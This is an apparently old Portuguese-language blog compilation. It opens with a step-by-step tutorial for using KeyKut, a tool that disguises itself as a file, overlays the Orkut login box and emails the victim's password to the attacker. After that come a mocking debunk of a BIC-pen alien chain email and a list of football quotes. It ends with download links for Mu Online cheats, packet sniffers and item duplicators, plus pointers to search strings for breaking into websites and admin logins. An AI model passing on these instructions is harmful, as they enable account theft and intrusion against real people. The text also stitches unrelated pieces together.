Keykut tutorial

1° passo.
Baixe o seu KeyKut. (http://rapidshare.com/files/15366077/keykut.exe)
2° Passo.
Abra o "Editor do KeyKut" e Selecione o Arquivo Server_KeyKut.exe (Executavel) ou o Server_KeyKut.scr (Proteção de tela). Imagem:

Após selecionar o arquivo. aparecerá a seguinte tela:

Configure o Email que deseja receber o Login e Senha. e Clique em Salvar.
3° passo.
Renomeie o arquivo que você abriu com o Editor do Keykut (Ex: Server_Keykut .exe ou .scr ). (obs: Renomeeie o arquivo, deixe a mesma extenção). Imagem:

4° Envie o arquivo para a vitima e espere. quando ela abrir a pagina do orkut no Computador. uma tela (Do KeyKut) será pintada em cima do campo de login. mas ela não vai perceber.
Obs: Resolução 1024 X 860
Quando ela Clicar em Efetuar Login. o site será fechado. e a senha será enviada para o Email Configurado.
Imagem:

A Conspiração das Canetas BIC... Bullshit!

Há algum tempo recebi um e-mail com sotaque brasileiro que fala dos perigos de se usar as mundialmente famosas canetas BIC. Quem alerta é o “Serviço Secreto União dos Povos”. Segundo a mensagem, as letras da marca dessa caneta formam a abreviatura de “Big Inspekto Center”, ou seja “Grande Centro de Inspecções”. E quem realiza essas grandes inspecções? É aí que reside o perigo. Essas canetas, presentes em quase todos os lugares da casa ou do escritório, são na verdade, sondas espaciais camufladas enviadas à Terra por seres alienígenas. A NASA está envolvida nessa trama articulada pelos aliens. Os alienígenas estão interessados em invadir a Terra e contam com a colaboração da Agência Espacial Americana nessa empreitada (deve ser gratificante saber que mesmo depois de todos os escândalos que envolveram adultério, álcool, etc… os ETs ainda confiam na NASA para lhes fazer o trabalho sujo). Qual o interesse da NASA nessa invasão? Mistério total, pois se não houvesse mistério, não haveria nenhuma teoria da conspiração.

A mensagem original é esta:


"Você está sendo rastreado/a!!!!!!!!"

SEI QUE É GRANDE, MAS É DE EXTREMA IMPORTÂNCIA. LEIA E REPASSE, POIS NOSSAS VIDAS DEPENDEM DESSA NOVA E APAVORANTE DESCOBERTA.

O PERIGO DAS CANETAS BIC

Acredito que sempre que pensamos em "caneta", temos uma imagem projetada em nossa mente, a qual diz respeito às famosas canetas BIC. Esta marca de canetas, que investe pouquíssimo em propaganda, fixou uma imagem muito forte diante a tantas outras marcas e modelos.

Você já se perguntou como isso aconteceu? Certamente responderá que, por esta ser uma caneta barata, simples e de fácil acesso, tornou-se "convencional" o seu uso no dia-a-dia, desde a escola até a empresa onde trabalha. Pois bem, a resposta não é assim tão simples!

Documentos secretos encontrados no final do ano de 2001 indicam um envolvimento direto da NASA com a BIC. Também foram encontrados documentos oficiais da NASA, onde estavam registrados estudos sobre uma possível invasão de sondas extraterrestres no Planeta Terra. Acredite ou não, estamos sendo vigiados a anos sem percepção alguma. De fato conclui-se que as canetas BIC são sem sombra de dúvida sondas extraterrestres que nos inspecionam diariamente, desde nossa infância até hoje, em casa, na escola, na universidade, nos hospitais, no trabalho, em tudo. Certamente você está exposto a uma caneta BIC neste exato momento; olhe ao seu lado, dificilmente num raio de 15 metros não haverá uma sonda.

Agora pense comigo:

Ao nascer você é registrado com uma caneta, ao entrar para a escola/universidade também, tudo o que você escreve, desde estudos até cartas de amor é escrito com uma caneta, ou seja, estes seres que nos observam sabe de absolutamente TUDO sobre TODOS.

O verdadeiro significado da marca BIC é: Big Inspekto Center (ou Centro de Grandes Inspeções). No logotipo da BIC notamos um alien tentando esconder atrás dele seu maior segredo: uma caneta que pode contar toda a história de todos os tempos (simbolizado pelo traço preto atrás do alien).

Vejamos agora algumas dicas que nos levam a propor esta idéia:

-As canetas BIC são facilmente encontradas para serem vendidas, porém depois que você já a possui, ela sempre aparece em diferentes locais e você nunca se questiona se realmente havia deixado onde encontrou.

-Mesmo que você compre apenas uma caneta BIC, certamente encontrará várias no local onde a deixar. Elas se multiplicam rapidamente, sem ser perceptível a nós dotados de uma visão banal para a visão alienígena.

-Após poucos meses, a caneta que você havia comprado, simplesmente desaparece. Isso é facilmente decifrável se pensarmos da seguinte maneira: tudo necessita de energia para sobreviver (o homem, o carro, as plantas, sua TV), e ao acabar esta energia, ela precisa ser reposta.

Assim, as sondas BIC tem um período de vida curto, visto que quando se encontram gastas, elas simplesmente se desintegram para uma possível recarga.

A mensagem que quero deixar é que você tenha muito cuidado ao se deparar com estas canetas-sondas, principalmente com as sondas mais avançadas, vulgarmente chamadas de BIC 4 Cores, BIC 2 CORES ou mesmo a tão temida e perigosa BIC VERDE! Esta última jamais deve ser colocada (presa) em cima da orelha, pois além de enviar dados e informações sobre você para os alienígenas consegue influenciar de maneira drástica sua forma de pensar, tornando-o um escravo a serviço alienígena. Torno a repetir:

CUIDADO COM A MANIPULAÇÃO ALIEN!

Já estamos todos envolvidos nisso. Tentar qualquer forma de fuga ou apatia não é aconselhável. Saiba lidar com elas! Desta forma acredito que não mais estaremos expostos a uma ideologia aliem, e poderemos defender o que realmente pertence a nós: o Planeta Terra!

Serviço Secreto União dos Povos.

Reparem no “secreto”, é uma palavra que fica sempre bem neste tipo de assuntos. E os extraterrestres ainda põem a fotografia deles na caneta pois pensam que somos estúpidos demais para descobrir a verdade, mas enganam-se, porque aqui o “Serviço Secreto União dos Povos” já os toparam lol. Ainda bem que de momento não tenho nenhuma caneta BIC por perto, já me sinto muito mais seguro, bem… a não ser que os aliens tenham escondido uma na minha casa sem eu saber, ou talvez tenham mesmo implantado uma no meu cérebro! lol

Agora a sério, eu quero acreditar que isto é um e-mail jocoso, uma simples brincadeira. Mas a verdade é que mesmo que alguém tenha escrito isto apenas por brincadeira, há-de sempre haver uns otários que vão achar que é verdade e que vão transformar isto num mito urbano.

Por isso vou deixar-me ir na onda também, aqui vão os meus pensamentos:

O comprimento da caneta com a tampa colocada é de 150mm, e a distância entre a Terra e o Sol é de 150 milhões de km. A relação é evidente. As canetas BIC são objectos de culto solar introduzidas no nosso planeta por alguma civilização extraterrestre. Mas isso não é tudo. O comprimento da tampa da caneta é de 58mm, e se descontarmos o que mede o gancho (a parte que serve para que a caneta fique pendurada), restam 35mm. Somamos as duas medidas e obtemos 93, que multiplicado por 2 dá 186, exactamente 40mm mais do que o comprimento da caneta sem a tampa (146mm). E mais! A soma dos números do comprimento da tampa sem o gancho, 35mm (3+5), é 8, que é o diâmetro da caneta. Qualquer um pode ver que nestas proporções existe uma relação, são provavelmente algum tipo de código, talvez as chaves para a utilização de todo o poder e a energia do Sol.

E não apenas isso, provavelmente todos os segredos do Universo estão nessa caneta. Se somarmos o comprimento da caneta sem a tampa, e o comprimento da caneta com tampa, obtemos o total de 296, somando o resultado anterior, 296, com a medida da tampa sem o gancho, 35mm, temos 331, que multiplicado por 2 é 662, quase a Constante de Gravitação Universal salvo a correspondente notação científica (o valor desta constante é de 6,67 x 10^-11, o erro pode ser devido à falta de precisão nas nossas medições, ou então, a inteligência superior que criou estes objectos decidiu que era perigoso pôr demasiado conhecimento nas nossas mãos).

Além do mais, o comprimento do gancho é de 23mm. Se somarmos os números do comprimento total da caneta, 150mm (1+5+0), temos 6, que com os 23 do gancho resultam em 6,023, bastando acrescentar a notação científica de 10^-23 para obter o número de Avogadro!

lololol Estavam a pensar que eu tinha mesmo perdido tempo a fazer estas contas? Não, eu encontrei-as na internet, numa página que também goza com este e-mail. Mas a verdade é que quanto mais estudamos uma coisa, mais “coincidências” fantásticas encontramos, podemos pegar em qualquer objecto que eu garanto que havemos de descobrir uma ligação aos extraterrestres. É por causa destas coisas que na ciência se usa o princípio lógico da “Navalha de Occam” que diz: “se há várias explicações igualmente válidas para um facto, então devemos escolher a mais simples”.

(N FUI EU Q ESCREVI)obs:sem NoçãOo

Pérolas do Futebol

"EU PEGUEI A BOLA NO MEIO DE CAMPO E FUI FONDO, FUI FONDO, FUI FONDO E CHUTEI PRO GOL" (Jardel, ex-jogador do Vasco e Grêmio, ao relatar ao repórter o gol que tinha feito)
A BOLA IA INDO, INDO, INDO... E IU !!! (Paulo Nunes, comentando um gol que marcou quando jogava no Palmeiras)
"NEM QUE EU TIVESSE DOIS PULMÕES EU ALCANÇAVA ESSA BOLA" (Bradock, amigo de Romário, reclamando de um passe longo)
"NO MÉXICO QUE É BOM. LÁ, A GENTE RECEBE SEMANALMENTE DE 15 EM 15 DIAS" (Ferreira, ex-ponta esquerda do Santos)
"QUANDO O JOGO ESTÁ A MIL, MINHA NAFTALINA SOBE" (Jardel, ex-atacante do Vasco, Grêmio e da Seleção, hoje no Porto de Portugal)
"CLÁSSICO É CLÁSSICO E VICE-VERSA" (Jardel)
"O MEU CLUBE ESTAVA À BEIRA DO PRECIPÍCIO, MAS TOMOU A DECISÃO CORRETA: DEU UM PASSO À FRENTE" (João Pinto, jogador do Benfica de Portugal)
"A MOTO EU VOU VENDER E O RÁDIO EU VOU DAR PARA MINHA AVÓ" (Biro Biro, ex-jogador do Corinthians, ao responder a um repórter o que iria fazer com o "Motoradio" que ganhou como melhor jogador da partida)
"EU DISCONCORDO COMO QUE VOCÊ DISSE" (Vladimir, ex-meia do Corinthians, em uma entrevista à Rádio Record)
"NA BAHIA É TODO MUNDO MUITO SIMPÁTICO. É UM POVO MUITO HOSPITALAR" (Zanata, baiano, ex-lateral do Fluminense,ao comentar sobre a hospitalidade do povo Baiano)
"JOGADOR TEM QUE SER COMPLETO COMO O PATO, QUE É UM BICHO AQUÁTICO E GRAMÁTICO" (VicenteMatheus, eterno presidente do Corinthians)
"O DIFÍCIL, COMO VOCÊS SABEM, NÃO É FÁCIL" (Vicente Matheus) "HAJA O QUE HAJAR, O CORINTHIANS VAI SER CAMPEÃO" (Vicente Matheus)
"SEENTRA NA CHUVA É PARA SE QUEIMAR" (Vicente Matheus)
"O MAIOR GENERAL DA FRANÇA É O GENERAL ELETRIC" (Vicente Matheus, ao responder uma pergunta dos franceses que queriam comprar Sócrates)
"O SÓCRATES É INVENDÁVEL, INEGOCIÁVEL E IMPRESTÁVEL" (Vicente Matheus, ao recusar a oferta dos franceses)
"NÃO TEM OUTRA, TEMOS QUE JOGAR COM ESSA MESMA" (Reinaldo, do Atlético, ao responder a pergunta do repórter se ele ia jogar com aquela chuva)
Por isso que o Brasil é bom de bola, pois futebol não se aprende na escola! Agora SENTA E CHORA: Você que estudou anos e anos...e compare seu salário com o deles...

Hacker Mu-Online

- Como usa-los : RoxZin

VAULT EDITOR:
TeenWorld -
Vault
RoxZin - Vault
About - Vault
Zuritarula - Vault

CHAR EDITOR:
TeenWorld -
Char
RoxZin - Char
About - Char
Zuritarula - Char

ADM EDITOR:
Vamp 2500 -
GM-PHP
RoxZin - GM-PHP
AboutMu - GM-PHP
About - GM-PHP

DOWNLOAD ITEM PROJECT
Download Item Project 01
Download Item Project 02
Download Item Project 03
Download Item Project 04 (Dark Lord)

DOWNLOADS DO HACKERS DE MU GLOBAL :
Duplicador de Itens
GoMu
MuGod
MuPieHGV2
MuPieHGV3
MuPieMinimizer
MuPieTesteBeta
MuPieXBeta
MuProxy
MuSniff
MuPie0.52
MuPie0.53
TradeHacker
Speed Hack

Capote: http://www.4shared.com/file/22482379/b173c547/Capote.html
senha:FaelLHacks

Speedhacker:http://www.4shared.com/file/22482692/bee9f3aa/spd.html
senha:FaelLHacks

HahaMu 1.16: http://www.4shared.com/file/22483382/19856765/haha.html
senha:FaelLHacks
MuGod Hit Hacker:
http://www.4shared.com/file/22483470/755c0c03/hitck.html
senha:FaelLHacks

Mu Minimizer: http://www.4shared.com/file/22483811/5d1b6277/WMode.html
senha:FaelLHacks

esse hack contem:

- CAPOTE CHEAT
- SPEED HACKER CHEAT
- AUTOBUFF
- MANASHIELD 100%
- ENTRE OUTROS
link 1:

http://rapidshare.com/files/99562151/MuPi_Hacker.rar

caso o link 1 nao funcione:

http://filebeam.com/728247e4974be9cb7a35d4e7a2dc4d9a

outro Hacker "Hech"

http://rapidshare.com/files/126849873/Capote.zip.html

HHD Hex Editor >> http://rapidshare.de/files/3948804/free-hex-editor.zip.html


Este programa é um editor de códigos hexadecimais.
Com ele é possível alterar o código de um jogo podendo
fazer alguns cheats como Speed hack (Mu online),
Gold hack (Gunbound) e muitos outros. Necessita saber
linguagens de programação para facilitar seu uso ou
pegue um tutorial de algum cheat, Download acima.

Strings para procurar No google(para invadir sites) Clike aki

Strings para ter acesso no campo de Login e senha do ADM Clike aki

qualquer duvida sobre as strings veja o video do youtube..clike aki

Guia do Hacker Brasileiro..(ensinando várias coisas) Clike aki

editor de char e vault clike aki

tuturial de editor de char e vault clike aki

editor de mu com register clike aki

Minimizador de mu online clike aki

Muphiev3 esse nem precisa fala como funfa clike aki

editando por site,(php)`e so o tuturial mas da pra edita..clike aki

obs..no mu register tem o itemquery(codificador)para editar no mu quando vc for hackia pelo site(php)

Varios hacks para mu online clike aki

Cheat Engine 5.3 se vc tiver o antivirus avast vai reconhecer como virus mas naum faz nd esse programa clike aki